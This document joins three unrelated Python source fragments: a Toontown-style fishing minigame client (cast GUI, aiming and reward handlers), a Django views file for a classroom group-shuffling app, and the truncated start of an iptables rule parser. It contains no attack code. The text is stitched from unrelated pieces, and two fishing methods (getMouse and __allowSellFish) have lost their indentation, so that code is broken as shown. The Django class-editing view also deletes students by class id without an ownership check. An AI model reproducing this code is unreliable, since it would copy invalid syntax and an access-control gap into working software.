        self.arrow.reparentTo(self.castGui)
        self.arrow.setColorScale(0.9, 0.9, 0.1, 0.7)
        self.arrow.hide()
        self.jar = DirectLabel(parent=self.castGui, relief=None, text=str(self.av.getMoney()), text_scale=0.16, text_fg=(0.95, 0.95, 0, 1), text_font=ToontownGlobals.getSignFont(), pos=(-1.12, 0, -1.3))
        self.bucket = DirectLabel(parent=self.castGui, relief=None, text='', text_scale=0.09, text_fg=(0.95, 0.95, 0, 1), text_shadow=(0, 0, 0, 1), pos=(1.14, 0, -1.33))
        self.__updateFishTankGui()
        # Reward-item panel (fish/boot/jellybean/package) shown after a catch.
        self.itemGui = NodePath('itemGui')
        self.itemFrame = DirectFrame(parent=self.itemGui, relief=None, geom=DGG.getDefaultDialogGeom(), geom_color=ToontownGlobals.GlobalDialogColor, geom_scale=(1, 1, 0.6), text=TTLocalizer.FishingItemFound, text_pos=(0, 0.2), text_scale=0.08, pos=(0, 0, 0.587))
        self.itemLabel = DirectLabel(parent=self.itemFrame, text='', text_scale=0.06, pos=(0, 0, -0.25))
        buttons = loader.loadModel('phase_3/models/gui/dialog_box_buttons_gui')
        self.itemGuiCloseButton = DirectButton(parent=self.itemFrame, pos=(0.44, 0, -0.24), relief=None, image=(buttons.find('**/CloseBtn_UP'), buttons.find('**/CloseBtn_DN'), buttons.find('**/CloseBtn_Rllvr')), image_scale=(0.7, 1, 0.7), command=self.__itemGuiClose)
        buttons.removeNode()
        jarGui = loader.loadModel('phase_3.5/models/gui/jar_gui')
        bootGui = loader.loadModel('phase_4/models/gui/fishing_boot')
        packageGui = loader.loadModel('phase_3.5/models/gui/stickerbook_gui').find('**/package')
        self.itemJellybean = DirectFrame(parent=self.itemFrame, relief=None, image=jarGui, scale=0.5)
        self.itemBoot = DirectFrame(parent=self.itemFrame, relief=None, image=bootGui, scale=0.2)
        self.itemPackage = DirectFrame(parent=self.itemFrame, relief=None, image=packageGui, scale=0.25)
        self.itemJellybean.hide()
        self.itemBoot.hide()
        self.itemPackage.hide()
        self.failureDialog = TTDialog.TTGlobalDialog(dialogName=self.uniqueName('failureDialog'), doneEvent=self.uniqueName('failureDialog'), command=self.__userExit, message=TTLocalizer.FishingFailure, style=TTDialog.CancelOnly, cancelButtonText=TTLocalizer.FishingExit)
        self.failureDialog.hide()
        self.sellFishDialog = TTDialog.TTGlobalDialog(dialogName=self.uniqueName('sellFishDialog'), doneEvent=self.uniqueName('sellFishDialog'), command=self.__sellFish, message=TTLocalizer.FishBingoOfferToSellFish, style=TTDialog.YesNo)
        self.sellFishDialog.hide()
        self.sellFishConfirmDialog = TTDialog.TTGlobalDialog(dialogName=self.uniqueName('sellFishConfirmDialog'), doneEvent=self.uniqueName('sellFishConfirmDialog'), command=self.__sellFishConfirm, message=TTLocalizer.STOREOWNER_TROPHY, style=TTDialog.Acknowledge)
        self.sellFishConfirmDialog.hide()
        self.brokeDialog = TTDialog.TTGlobalDialog(dialogName=self.uniqueName('brokeDialog'), doneEvent=self.uniqueName('brokeDialog'), command=self.__userExit, message=TTLocalizer.FishingBroke, style=TTDialog.CancelOnly, cancelButtonText=TTLocalizer.FishingExit)
        self.brokeDialog.hide()
        self.howToDialog = TTDialog.TTGlobalDialog(dialogName=self.uniqueName('howToDialog'), doneEvent=self.uniqueName('howToDialog'), fadeScreen=0, message=TTLocalizer.FishingHowToFailed, style=TTDialog.Acknowledge)
        self.howToDialog['command'] = self.__hideHowTo
        self.howToDialog.setPos(-0.3, 0, 0.5)
        self.howToDialog.hide()
        self.madeGui = 1
        return
    def __setBingoCastGui(self):
        """Apply or revert the compact bingo-night layout of bucket and jar."""
        if self.pond.hasPondBingoManager():
            self.notify.debug('__setBingoCastGui: Has PondBing Manager %s' % self.pond.getPondBingoManager().getDoId())
            # Dock the labels inside their display frames and shrink/shift
            # them so the bingo card fits on screen.
            bucket = self.castGui.find('**/bucket')
            self.castGui.find('**/display_bucket').reparentTo(bucket)
            self.bucket.reparentTo(bucket)
            jar = self.castGui.find('**/jar')
            self.castGui.find('**/display_jar').reparentTo(jar)
            self.jar.reparentTo(jar)
            base.setCellsActive(base.rightCells, 0)
            bucket.setScale(0.9)
            bucket.setX(-1.9)
            bucket.setZ(-.11)
            jar.setScale(0.9)
            jar.setX(-.375)
            jar.setZ(-.135)
        else:
            self.notify.debug('__setItemFramePos: Has No Pond Bingo Manager')
            # Standard layout: full size at the origin.
            bucket = self.castGui.find('**/bucket')
            bucket.setScale(1)
            bucket.setPos(0, 0, 0)
            jar = self.castGui.find('**/jar')
            jar.setScale(1)
            jar.setPos(0, 0, 0)
    def resetCastGui(self):
        """Animate bucket and jar back to the standard layout when bingo ends."""
        self.notify.debug('resetCastGui: Bingo Night Ends - resetting Gui')
        bucket = self.castGui.find('**/bucket')
        jar = self.castGui.find('**/jar')
        bucketPosInt = bucket.posInterval(5.0, Point3(0, 0, 0), startPos=bucket.getPos(), blendType='easeInOut')
        bucketScaleInt = bucket.scaleInterval(5.0, VBase3(1.0, 1.0, 1.0), startScale=bucket.getScale(), blendType='easeInOut')
        bucketTrack = Parallel(bucketPosInt, bucketScaleInt)
        jarPosInt = jar.posInterval(5.0, Point3(0, 0, 0), startPos=jar.getPos(), blendType='easeInOut')
        jarScaleInt = jar.scaleInterval(5.0, VBase3(1.0, 1.0, 1.0), startScale=jar.getScale(), blendType='easeInOut')
        jarTrack = Parallel(jarPosInt, jarScaleInt)
        self.guiTrack = Parallel(bucketTrack, jarTrack)
        self.guiTrack.start()
    def setCastGui(self):
        """Animate bucket and jar into the compact bingo layout at bingo start."""
        self.notify.debug('setCastGui: Bingo Night Starts - setting Gui')
        bucket = self.castGui.find('**/bucket')
        self.castGui.find('**/display_bucket').reparentTo(bucket)
        self.bucket.reparentTo(bucket)
        jar = self.castGui.find('**/jar')
        self.castGui.find('**/display_jar').reparentTo(jar)
        self.jar.reparentTo(jar)
        # Target pos/scale match the static values in __setBingoCastGui.
        bucketPosInt = bucket.posInterval(3.0, Point3(-1.9, 0, -.11), startPos=bucket.getPos(), blendType='easeInOut')
        bucketScaleInt = bucket.scaleInterval(3.0, VBase3(0.9, 0.9, 0.9), startScale=bucket.getScale(), blendType='easeInOut')
        bucketTrack = Parallel(bucketPosInt, bucketScaleInt)
        jarPosInt = jar.posInterval(3.0, Point3(-.375, 0, -.135), startPos=jar.getPos(), blendType='easeInOut')
        jarScaleInt = jar.scaleInterval(3.0, VBase3(0.9, 0.9, 0.9), startScale=jar.getScale(), blendType='easeInOut')
        jarTrack = Parallel(jarPosInt, jarScaleInt)
        self.guiTrack = Parallel(bucketTrack, jarTrack)
        self.guiTrack.start()
    def setJarAmount(self, amount):
        """Add amount (may be negative) to the displayed jar, capped at max."""
        if self.madeGui:
            money = int(self.jar['text']) + amount
            pocketMoney = min(money, self.av.getMaxMoney())
            self.jar.setProp('text', str(pocketMoney))
    def __unmakeGui(self):
        """Destroy everything __makeGui built; safe no-op when not built."""
        if not self.madeGui:
            return
        self.timer.destroy()
        del self.timer
        self.exitButton.destroy()
        self.castButton.destroy()
        self.jar.destroy()
        self.bucket.destroy()
        self.itemFrame.destroy()
        self.itemGui.removeNode()
        self.failureDialog.cleanup()
        self.sellFishDialog.cleanup()
        self.sellFishConfirmDialog.cleanup()
        self.brokeDialog.cleanup()
        self.howToDialog.cleanup()
        self.castGui.removeNode()
        self.madeGui = 0
    def localAdjustingCastTask(self, state):
        """Per-frame aiming task: mouse drag sets cast power and heading.

        Power comes from drag distance, heading from the drag direction;
        the arrow widget and the avatar's cast animation preview both track
        the current values.
        """
        self.getMouse()
        deltaX = self.mouseX - self.initMouseX
        deltaY = self.mouseY - self.initMouseY
        if deltaY >= 0:
            # Dragging upward (or not at all): no charge yet.
            if self.power == 0:
                self.arrowTail.setScale(0.075, 0.075, 0)
                self.arrow.setR(0)
                self.castTrack.pause()
            return Task.cont
        dist = math.sqrt(deltaX * deltaX + deltaY * deltaY)
        delta = dist / 0.5
        self.power = max(min(abs(delta), 1.0), 0.0)
        # Scrub the cast animation to preview the wind-up.
        self.castTrack.setT(0.2 + self.power * 0.7)
        angle = rad2Deg(math.atan(deltaX / deltaY))
        if self.power < 0.25:
            # Damp heading jitter at low power.
            angle = angle * math.pow(self.power * 4, 3)
        # NOTE(review): delta = dist/0.5 is never negative (dist >= 0), so
        # this branch looks unreachable — confirm before relying on it.
        if delta < 0:
            angle += 180
        minAngle = -FishGlobals.FishingAngleMax
        maxAngle = FishGlobals.FishingAngleMax
        if angle < minAngle:
            self.arrow.setColorScale(1, 0, 0, 1)
            angle = minAngle
        elif angle > maxAngle:
            self.arrow.setColorScale(1, 0, 0, 1)
            angle = maxAngle
        else:
            self.arrow.setColorScale(1, 1 - math.pow(self.power, 3), 0.1, 0.7)
        self.arrowTail.setScale(0.075, 0.075, self.power * 0.2)
        self.arrow.setR(angle)
        self.angleNP.setH(-angle)
        return Task.cont
    def localAdjustingCastTaskIndAxes(self, state):
        """Alternate aiming task: X drag sets heading, Y drag sets power."""
        self.getMouse()
        deltaX = self.mouseX - self.initMouseX
        deltaY = self.mouseY - self.initMouseY
        self.power = max(min(abs(deltaY) * 1.5, 1.0), 0.0)
        self.castTrack.setT(0.4 + self.power * 0.5)
        angle = deltaX * -180.0
        self.angleNP.setH(self.startAngleNP - angle)
        return Task.cont
def getMouse(self):
if base.mouseWatcherNode.hasMouse():
self.mouseX = base.mouseWatcherNode.getMouseX()
self.mouseY = base.mouseWatcherNode.getMouseY()
else:
self.mouseX = 0
self.mouseY = 0
    def createCastTrack(self):
        """Build the cast animation sequence scrubbed during aiming/casting."""
        self.castTrack = Sequence(ActorInterval(self.av, 'castlong', playRate=4), ActorInterval(self.av, 'cast', startFrame=20), Func(self.av.loop, 'fish-neutral'))
    def startMoveBobTask(self):
        """Show the bob at the pole tip and start its ballistic flight task."""
        self.__showBob()
        taskMgr.add(self.moveBobTask, self.taskName('moveBobTask'))
    def moveBobTask(self, task):
        """Per-frame task: fly the bob on a ballistic arc until it hits water."""
        g = 32.2  # gravitational acceleration (ft/s^2 scale)
        t = task.time
        vZero = self.power * self.vZeroMax
        angle = deg2Rad(self.power * self.angleMax)
        deltaY = vZero * math.cos(angle) * t
        deltaZ = vZero * math.sin(angle) * t - g * t * t / 2.0
        deltaPos = Point3(0, deltaY, deltaZ)
        # NOTE(review): re-assigning bobStartPos every frame is redundant —
        # the same constant is set in generateInit.
        self.bobStartPos = Point3(0.0, 3.0, 8.5)
        pos = self.bobStartPos + deltaPos
        self.bob.setPos(pos)
        if pos[2] < self.waterLevel:
            # Splash-down: hand control to the fishing state.
            self.fsm.request('fishing')
            return Task.done
        else:
            return Task.cont
    def __showBob(self):
        """Attach the bob at the pole tip (avatar pose updated first)."""
        self.__hideBob()
        self.bob.reparentTo(self.angleNP)
        self.bob.setPos(self.ptop, 0, 0, 0)
        self.av.update(0)
    def hitTarget(self):
        """The bob landed on a fishing target; wait for the AI's verdict."""
        self.fsm.request('waitForAI')
    def enterOff(self):
        """FSM: inactive state — nothing to do."""
        pass
    def exitOff(self):
        """FSM: leaving the inactive state — nothing to do."""
        pass
    def enterWaiting(self, doAnimation = True):
        """FSM: idle-at-spot state; optionally play the sit-down movie.

        With doAnimation the toon runs to the spot and pulls out the pole;
        for the local toon the camera also swings behind and the casting
        HUD appears at the end of the movie.
        """
        self.av.stopLookAround()
        self.__hideLine()
        self.track = Parallel()
        if doAnimation:
            toonTrack = Sequence(Func(self.av.setPlayRate, 1.0, 'run'), Func(self.av.loop, 'run'), LerpPosHprInterval(self.av, 1.0, Point3(0, 0, 0), Point3(0, 0, 0)), Func(self.__placeAvatar), Parallel(ActorInterval(self.av, 'pole'), Func(self.pole.pose, 'cast', 0), LerpScaleInterval(self.pole, duration=0.5, scale=1.0, startScale=0.01)), Func(self.av.loop, 'pole-neutral'))
            if self.localToonFishing:
                camera.wrtReparentTo(render)
                self.track.append(LerpPosHprInterval(nodePath=camera, other=self.av, duration=1.5, pos=Point3(0, -12, 15), hpr=VBase3(0, -38, 0), blendType='easeInOut'))
                toonTrack.append(Func(self.__showCastGui))
                toonTrack.append(Func(self.__initCastGui))
                if base.wantBingo:
                    self.__appendBingoMethod(toonTrack, self.pond.showBingoGui)
            self.track.append(toonTrack)
        else:
            self.__showCastGui()
        self.track.start()
    def __appendBingoMethod(self, interval, callback):
        """Append callback to interval as a Func step (bingo GUI hook)."""
        interval.append(Func(callback))
    def exitWaiting(self):
        """FSM: leave waiting — jump the entry movie to its end state."""
        self.track.finish()
        self.track = None
        return
    def enterLocalAdjusting(self, guiEvent = None):
        """FSM: local toon is holding the cast button and aiming.

        Bails out early (back to pole-neutral) when the toon cannot afford
        a cast or the fish tank is full; otherwise starts the per-frame
        aiming task and shows the power/heading arrow.
        """
        if self.track:
            self.track.pause()
        if self.castTrack:
            self.castTrack.pause()
        self.power = 0.0
        self.firstCast = 0
        # Button turns green while charging.
        self.castButton['image0_color'] = Vec4(0, 1, 0, 1)
        self.castButton['text'] = ''
        self.av.stopLookAround()
        self.__hideLine()
        self.__hideBob()
        self.howToDialog.hide()
        castCost = FishGlobals.getCastCost(self.av.getFishingRod())
        if self.av.getMoney() < castCost:
            self.__hideCastGui()
            self.__showBroke()
            self.av.loop('pole-neutral')
            return
        if self.av.isFishTankFull():
            self.__hideCastGui()
            self.__showFishTankFull()
            self.av.loop('pole-neutral')
            return
        self.arrow.show()
        self.arrow.setColorScale(1, 1, 0, 0.7)
        self.startAngleNP = self.angleNP.getH()
        self.getMouse()
        self.initMouseX = self.mouseX
        self.initMouseY = self.mouseY
        self.__hideBob()
        if config.GetBool('fishing-independent-axes', 0):
            taskMgr.add(self.localAdjustingCastTaskIndAxes, self.taskName('adjustCastTask'))
        else:
            taskMgr.add(self.localAdjustingCastTask, self.taskName('adjustCastTask'))
        if base.wantBingo:
            bingoMgr = self.pond.getPondBingoManager()
            if bingoMgr:
                bingoMgr.castingStarted()
    def exitLocalAdjusting(self):
        """FSM: stop the aiming task and restore the cast button visuals."""
        taskMgr.remove(self.taskName('adjustCastTask'))
        self.castButton['image0_color'] = Vec4(1, 0, 0, 1)
        self.castButton['text'] = TTLocalizer.FishingCast
        self.arrow.hide()
    def enterLocalCasting(self):
        """FSM: local toon released the button — perform the cast.

        A zero-power release from a brand-new angler shows the how-to
        panel instead of casting.  Otherwise the cast animation plays from
        a power-dependent start time and the cast is reported to the AI.
        """
        if self.power == 0.0 and len(self.av.fishCollection) == 0:
            self.__showHowTo(TTLocalizer.FishingHowToFailed)
            if self.castTrack:
                self.castTrack.pause()
            self.av.loop('pole-neutral')
            self.track = None
            return
        castCost = FishGlobals.getCastCost(self.av.getFishingRod())
        # Optimistically show the post-cast balance; the AI confirms later.
        self.jar['text'] = str(max(self.av.getMoney() - castCost, 0))
        if not self.castTrack:
            self.createCastTrack()
        self.castTrack.pause()
        # Stronger casts start the animation earlier (longer wind-up).
        startT = 0.7 + (1 - self.power) * 0.3
        self.castTrack.start(startT)
        self.track = Sequence(Wait(1.2 - startT), Func(self.startMoveBobTask), Func(self.__showLineCasting))
        self.track.start()
        heading = self.angleNP.getH()
        self.d_doCast(self.power, heading)
        self.timer.countdown(FishGlobals.CastTimeout)
        return
    def exitLocalCasting(self):
        """FSM: halt the bob flight and cast animation, hide line and bob."""
        taskMgr.remove(self.taskName('moveBobTask'))
        if self.track:
            self.track.pause()
            self.track = None
        if self.castTrack:
            self.castTrack.pause()
        self.__hideLine()
        self.__hideBob()
        return
    def enterDistCasting(self, power, h):
        """FSM: replay a remote toon's cast with the given power and heading."""
        self.av.stopLookAround()
        self.__placeAvatar()
        self.__hideLine()
        self.__hideBob()
        self.angleNP.setH(h)
        self.power = power
        self.track = Parallel(Sequence(ActorInterval(self.av, 'cast'), Func(self.pole.pose, 'cast', 0), Func(self.av.loop, 'fish-neutral')), Sequence(Wait(1.0), Func(self.startMoveBobTask), Func(self.__showLineCasting)))
        self.track.start()
    def exitDistCasting(self):
        """FSM: finish the remote cast movie and clean up line and bob."""
        self.track.finish()
        self.track = None
        taskMgr.remove(self.taskName('moveBobTask'))
        self.__hideLine()
        self.__hideBob()
        return
    def enterFishing(self):
        """FSM: bob is in the water; float it and (locally) watch for targets."""
        if self.localToonFishing:
            # Resume from where the interactive cast animation left off.
            self.track = Sequence(ActorInterval(self.av, 'cast'), Func(self.pole.pose, 'cast', 0), Func(self.av.loop, 'fish-neutral'))
            self.track.start(self.castTrack.getT())
        else:
            self.track = None
            self.av.loop('fish-neutral')
        self.__showBobFloat()
        self.__showLineWaiting()
        if self.localToonFishing:
            self.pond.startCheckingTargets(self, self.bob.getPos(render))
        return
    def exitFishing(self):
        """FSM: stop target checking and finish the fishing idle movie."""
        if self.localToonFishing:
            self.pond.stopCheckingTargets()
        if self.track:
            self.track.finish()
            self.track = None
        return
    def enterWaitForAI(self):
        """FSM: a bite was reported; lock the cast button until the AI replies."""
        self.castButton['state'] = DGG.DISABLED
    def exitWaitForAI(self):
        """FSM: AI replied; re-enable the cast button."""
        self.castButton['state'] = DGG.NORMAL
    def enterReward(self, code, itemDesc1, itemDesc2, itemDesc3):
        """FSM: reel in and present the catch described by code/itemDesc*.

        The itemDesc payload is code-dependent: quest item id, fish
        (genus, species, weight), jellybean amount, or unused for boots
        and failures.
        """
        self.__placeAvatar()
        self.bob.reparentTo(self.angleNP)
        self.waterLevel = FishingTargetGlobals.getWaterLevel(self.area)
        self.bob.setZ(self.waterLevel)
        self.__showLineReeling()
        self.castTrack.pause()
        if self.localToonFishing:
            self.__showCastGui()
            if code == FishGlobals.QuestItem:
                self.__showQuestItem(itemDesc1)
            elif code in (FishGlobals.FishItem, FishGlobals.FishItemNewEntry, FishGlobals.FishItemNewRecord):
                genus, species, weight = itemDesc1, itemDesc2, itemDesc3
                fish = FishBase.FishBase(genus, species, weight)
                self.__showFishItem(code, fish)
                if base.wantBingo:
                    self.pond.handleBingoCatch((genus, species))
            elif code == FishGlobals.BootItem:
                self.__showBootItem()
                if base.wantBingo:
                    self.pond.handleBingoCatch(FishGlobals.BingoBoot)
            elif code == FishGlobals.JellybeanItem:
                amount = itemDesc1
                self.__showJellybeanItem(amount)
            elif code == FishGlobals.OverTankLimit:
                self.__hideCastGui()
            else:
                self.__showFailureReason(code)
        self.track = Sequence(Parallel(ActorInterval(self.av, 'reel'), ActorInterval(self.pole, 'cast', startFrame=63, endFrame=127)), ActorInterval(self.av, 'reel-neutral'), Func(self.__hideLine), Func(self.__hideBob), ActorInterval(self.av, 'fish-again'), Func(self.av.loop, 'pole-neutral'))
        self.track.start()
    def cleanupFishPanel(self):
        """Destroy the caught-fish panel, if one is showing."""
        if self.fishPanel:
            self.fishPanel.hide()
            self.fishPanel.destroy()
            self.fishPanel = None
        return
    def hideBootPanel(self):
        """Close the reward panel when it is showing the boot item."""
        if self.madeGui and self.itemBoot:
            self.__itemGuiClose()
    def exitReward(self):
        """FSM: tear down the reward display and finish the reel-in movie."""
        if self.localToonFishing:
            self.itemGui.detachNode()
            self.cleanupFishPanel()
        self.track.finish()
        self.track = None
        return
    def enterLeaving(self):
        """FSM: play the put-away-pole movie; local toon also drops the HUD."""
        if self.localToonFishing:
            self.__hideCastGui()
            if base.wantBingo:
                self.pond.cleanupBingoMgr()
        self.av.stopLookAround()
        self.av.startLookAround()
        self.__placeAvatar()
        self.__hideLine()
        self.__hideBob()
        self.track = Sequence(Parallel(ActorInterval(self.av, 'fish-end'), Func(self.pole.pose, 'cast', 0), LerpScaleInterval(self.pole, duration=0.5, scale=0.01, startScale=1.0)), Func(self.__dropPole), Func(self.av.loop, 'neutral'))
        if self.localToonFishing:
            # Local toon returns to the FSM's final state when done.
            self.track.append(Func(self.fsm.requestFinalState))
        self.track.start()
    def exitLeaving(self):
        """FSM: pause (not finish) the leaving movie and drop the reference."""
        self.track.pause()
        self.track = None
        return
    def enterSellFish(self):
        """FSM: offer to sell the full fish tank (bingo estates only)."""
        self.castButton['state'] = DGG.DISABLED
        self.__showSellFishDialog()
        self.__hideHowTo()
    def exitSellFish(self):
        """FSM: close the sell dialogs and re-enable the cast button."""
        self.castButton['state'] = DGG.NORMAL
        self.__hideSellFishDialog()
        self.__hideSellFishConfirmDialog()
    def sellFishComplete(self, trophyResult, numFishCaught):
        """Distributed field: AI finished the sale; show trophy info or resume."""
        for button in self.sellFishDialog.buttonList:
            button['state'] = DGG.NORMAL
        if self.localToonFishing:
            if trophyResult:
                self.__hideSellFishDialog()
                self.__showSellFishConfirmDialog(numFishCaught)
            else:
                self.fsm.request('waiting', [False])
def __allowSellFish(self):
if base.wantBingo:
if self.pond.hasPondBingoManager():
hoodId = base.cr.playGame.getPlaceId()
if hoodId == ToontownGlobals.MyEstate:
return True
return False
| |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.utils.datastructures import MultiValueDictKeyError
from django.shortcuts import render, redirect
from django.http import HttpResponse, Http404
from django.views import View
from random import shuffle, randint
from django.contrib.auth import authenticate, login
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth.password_validation import validate_password, password_validators_help_texts
from django.core.exceptions import ValidationError, ObjectDoesNotExist
from .models import Gruppe, GruppeElev, Klasse, Elev, Advertisement
from .forms import UserForm, LoginForm
import uuid
import operator
# Create your views here.
#Here, users can enter student names etc. and submit.
def makegroup(request, selectedclassid=0):
    """Render the group-creation landing page.

    Authenticated users also get their classes listed; when
    ``selectedclassid`` is non-zero that class is preselected in the form.
    """
    loginform = LoginForm(None)
    error = False
    errormessage = ""
    classes = None
    selectedclass = None
    if request.user.is_authenticated:
        classes = Klasse.objects.filter(user=request.user)
    if selectedclassid != 0:
        selectedclass = Klasse.objects.filter(id=selectedclassid).first()
    context = {"error": error, "errormessage": errormessage, "loginform": loginform, "classes":classes, "selectedclass":selectedclass}
    return render(request, "gruppeapp/welcome.html", context)
#Here, users can view the newly generated group!
class Creategroup(View):
    """Shuffle submitted student names into a persisted, shareable group."""

    def post(self, request):
        """Create a group from POSTed student fields and redirect to it.

        Expects ``studentcounter`` (highest student index), ``numberofgroupsinput``
        and ``student0`` .. ``studentN`` fields.

        Fixes over the original: literal identity tests (``is not 0`` /
        ``is not ""``) replaced with equality, which is the defined
        comparison; the ValueError message now actually fires because the
        int() parsing moved inside the try; ``is_authenticated`` is used as
        a property, consistent with makegroup() and required on Django 2+.
        """
        students = []
        try:
            studentcounter = int(request.POST["studentcounter"])
            numberofgroups = int(request.POST["numberofgroupsinput"])
        except MultiValueDictKeyError:
            context = {"error": True, "errormessage": "No students added"}
            return render(request, "gruppeapp/welcome.html", context)
        except ValueError:
            context = {"error": True, "errormessage": "You didn't choose how many groups should be made"}
            return render(request, "gruppeapp/welcome.html", context)
        for i in range(0, studentcounter + 1):
            # Missing and blank name fields are skipped.
            name = request.POST.get("student" + str(i), "")
            if name != "":
                students.append(name)
        shuffle(students)
        linkhash = uuid.uuid4().hex
        gruppe = Gruppe(link=linkhash, antalgrupper=numberofgroups)
        if request.user.is_authenticated:
            gruppe.user = request.user
        gruppe.save()
        for position, name in enumerate(students):
            GruppeElev(navn=name, position=position, gruppe=gruppe).save()
        return redirect("gruppeapp:viewgroup", linkhash=linkhash)

    def get(self, request):
        """Groups are only created via POST."""
        raise Http404("Page not found")
class Creategroupfromclass(View):
    """Bridges the class picker to the group-creation page."""

    def get(self, request):
        return redirect("gruppeapp:makegroup")

    def post(self, request):
        selected = request.POST["classid"]
        return redirect("gruppeapp:makegroupwithclassid", selectedclassid=selected)
class About(View):
    """Static about page; only GET is supported."""

    def get(self, request):
        context = {"loginform": LoginForm(None)}
        return render(request, "gruppeapp/about.html", context)

    def post(self, request):
        raise Http404("Page not found")
def viewgroup(request, linkhash):
    """Render a generated group identified by its link hash.

    Shows the stored (already shuffled) students split into the stored
    number of groups, plus randomly chosen small and large ads above
    and below the listing.
    """
    loginform = LoginForm(None)
    gruppe = Gruppe.objects.get(link=linkhash)
    students = list(GruppeElev.objects.filter(gruppe=gruppe))
    # order_by('?') randomises the ads; first two of each size are used.
    smallqueryset = Advertisement.objects.filter(size="small").order_by('?')
    bigqueryset = Advertisement.objects.filter(size="large").order_by('?')
    smalloverhead = smallqueryset.first()
    bigoverhead = bigqueryset.first()
    try:
        smallunderhead = smallqueryset[1]
        bigunderhead = bigqueryset[1]
    except IndexError:
        # Fewer than two ads of a size: reuse the first one.
        smallunderhead = smalloverhead
        bigunderhead = bigoverhead
    context = {
        "students": students,
        "numberofgroups": gruppe.antalgrupper,
        "numberofgroupsrange": range(0, gruppe.antalgrupper),
        "loginform": loginform,
        "smalloverhead": smalloverhead,
        "bigoverhead": bigoverhead,
        "smallunderhead": smallunderhead,
        "bigunderhead": bigunderhead,
    }
    return render(request, "gruppeapp/viewgroup.html", context)
class SignUpView(View):
    """User registration with password validation and automatic login."""

    form_class = UserForm
    template_name = "gruppeapp/registration_form.html"

    def post(self, request):
        form = self.form_class(request.POST)
        loginform = LoginForm(None)
        context = {
            "form": form,
            "errorhelp": password_validators_help_texts(),
            "loginform": loginform,
        }
        if form.is_valid():
            user = form.save(commit=False)
            user.username = form.cleaned_data["username"]
            user.email = form.cleaned_data["email"]
            password = form.cleaned_data["password1"]
            try:
                validate_password(password)
            except ValidationError:
                # Password rejected by the validators: re-show the form.
                return render(request, self.template_name, context)
            user.set_password(password)
            user.save()
            user = authenticate(username=form.cleaned_data["username"], password=password)
            if user is not None and user.is_active:
                login(request, user)
                return redirect("gruppeapp:makegroup")
        return render(request, self.template_name, context)

    def get(self, request):
        context = {
            "form": self.form_class(None),
            "errorhelp": password_validators_help_texts(),
            "loginform": LoginForm(None),
        }
        return render(request, self.template_name, context)
class LoginView(View):
    """Session login; every outcome lands back on the group-creation page."""

    def post(self, request):
        """Authenticate the user and set the session lifetime.

        With "remember me" the session lasts 30 days, otherwise it
        expires after 360 seconds. Success and failure both redirect to
        makegroup (errors are not surfaced here).
        """
        form = LoginForm(request.POST)
        if form.is_valid():
            username = form.cleaned_data['username']
            password = form.cleaned_data['password']
            user = authenticate(username=username, password=password)
            if user is not None:
                login(request, user)
                if request.POST.get('remember_me', None):
                    request.session.set_expiry(60 * 60 * 24 * 30)  # 30 days
                else:
                    request.session.set_expiry(360)  # 6 minutes
        return redirect("gruppeapp:makegroup")

    def get(self, request):
        """Login is POST-only; GET just bounces to makegroup."""
        return redirect("gruppeapp:makegroup")
class MyClassesView(View):
    """Lets a signed-in user view and edit their classes and students."""

    template_name = "gruppeapp/myclasses.html"

    def post(self, request):
        """Replace the students of the submitted class.

        The form posts one "...classid" field plus "...name" /
        "...newstudentname" fields; every existing student of the class
        is deleted and the posted names recreated in sorted-key order.
        """
        if not request.user.is_authenticated:
            # The original fell through and returned None (a 500); treat
            # an anonymous POST as a missing page instead.
            raise Http404("Page not found")
        classid = 0
        currentclass = None
        # First pass: find the class id and clear its current students.
        for key in request.POST:
            if key.endswith("classid"):
                classid = request.POST[key]
                currentclass = Klasse.objects.filter(id=classid).first()
                currentclass.elev_set.all().delete()
        # Second pass: recreate students. endswith("name") also matches
        # "...newstudentname", so one branch covers both field kinds
        # (the original's elif was unreachable).
        for key in sorted(request.POST):
            if key.endswith("name"):
                Elev(navn=request.POST[key], klasse=currentclass).save()
        classes = Klasse.objects.filter(user=request.user)
        classfromquery = classes.filter(pk=classid).first()
        context = {
            "classes": classes,
            "loginform": LoginForm(None),
            "currentclass": classfromquery,
        }
        return render(request, self.template_name, context)

    def get(self, request, currentclass=0):
        """Show the user's classes; ``currentclass`` selects one by pk."""
        if request.user.is_authenticated:
            classes = Klasse.objects.filter(user=request.user)
            # != instead of `is not`: identity comparison on ints is an
            # implementation detail and fails for non-cached values.
            if currentclass != 0:
                classfromquery = classes.filter(pk=currentclass).first()
            else:
                classfromquery = classes.first()
            context = {
                "classes": classes,
                "loginform": LoginForm(None),
                "currentclass": classfromquery,
            }
            return render(request, self.template_name, context)
        context = {"loginerror": True, "loginform": LoginForm(None)}
        return render(request, self.template_name, context)
class CreateNewClass(View):
    """Creates a class owned by the logged-in user."""

    def post(self, request):
        if not request.user.is_authenticated:
            raise Http404("Page not found")
        newclass = Klasse(
            navn=request.POST["classname"],
            description=request.POST["classdescription"],
            user=request.user,
        )
        newclass.save()
        return redirect("gruppeapp:myclasses")

    def get(self, request):
        return redirect("gruppeapp:myclasses")
class DeleteClass(View):
    """Deletes one of the logged-in user's classes."""

    def post(self, request):
        if not request.user.is_authenticated:
            # Consistent with CreateNewClass: anonymous writes are 404s.
            raise Http404("Page not found")
        classid = request.POST["classid"]
        # Restrict the delete to classes owned by the requester; the
        # previous version let any user delete any class by id (IDOR).
        Klasse.objects.filter(id=classid, user=request.user).delete()
        return redirect("gruppeapp:myclasses")

    def get(self, request):
        return redirect("gruppeapp:myclasses")
def privacypolicy(request):
    """Render the static privacy-policy page."""
    return render(request, "gruppeapp/privacypolicy.htm")
| |
from netaddr import *
from IPy import IP
import itertools
import socket
import re
import json
import sys
import os
PLUGINPATH = "plugins"
class Match(object):
    """A single iptables match (e.g. dport, src-range) attached to a rule.

    Attribute names are normalised by replacing "-" with "_" so that
    iptables option names like "src-range" become valid identifiers.
    The same normalisation is applied on lookup, so getattr(m, "src-range")
    finds a value stored via setattr(m, "src-range", ...).
    """

    def __init__(self, name, rule=None):
        self.name = name
        self.rule = rule

    def __getattr__(self, name):
        # Only reached when normal lookup fails; retry with the hyphen
        # normalisation used by __setattr__.
        name = name.replace("-", "_")
        try:
            return super(Match, self).__getattribute__(name)
        except AttributeError:
            # The original caught KeyError here, which never fires:
            # __getattribute__ raises AttributeError.
            raise AttributeError(name)

    def __setattr__(self, key, value):
        key = key.replace("-", "_")
        super(Match, self).__setattr__(key, value)
class Rule(object):
    """ Rules are entries in chains
    """
